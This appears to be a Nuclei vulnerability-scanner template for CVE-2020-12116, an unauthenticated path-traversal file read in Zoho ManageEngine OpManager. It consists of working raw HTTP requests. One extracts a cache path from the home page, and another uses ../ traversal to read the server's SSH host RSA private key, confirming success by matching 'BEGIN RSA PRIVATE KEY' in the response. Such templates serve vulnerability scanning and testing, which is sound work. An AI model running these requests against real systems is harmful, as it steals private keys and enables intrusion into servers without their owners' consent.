id: CVE-2020-12116 info: name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read author: dwisiswant0 severity: high description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request. tags: cve,cve2020,zoho,lfi reference: https://github.com/BeetleChunks/CVE-2020-12116 requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* Connection: close - | GET §endpoint§../../../../bin/.ssh_host_rsa_key HTTP/1.1 Host: {{Hostname}} Accept: */* Cache-Control: max-age=0 Connection: close Referer: http://{{Hostname}} extractors: - type: regex name: endpoint part: body internal: true regex: - "(?m)/cachestart/.*/jquery/" req-condition: true matchers: - type: dsl dsl: - 'contains(body_2, "BEGIN RSA PRIVATE KEY")' - 'status_code_2 == 200' condition: and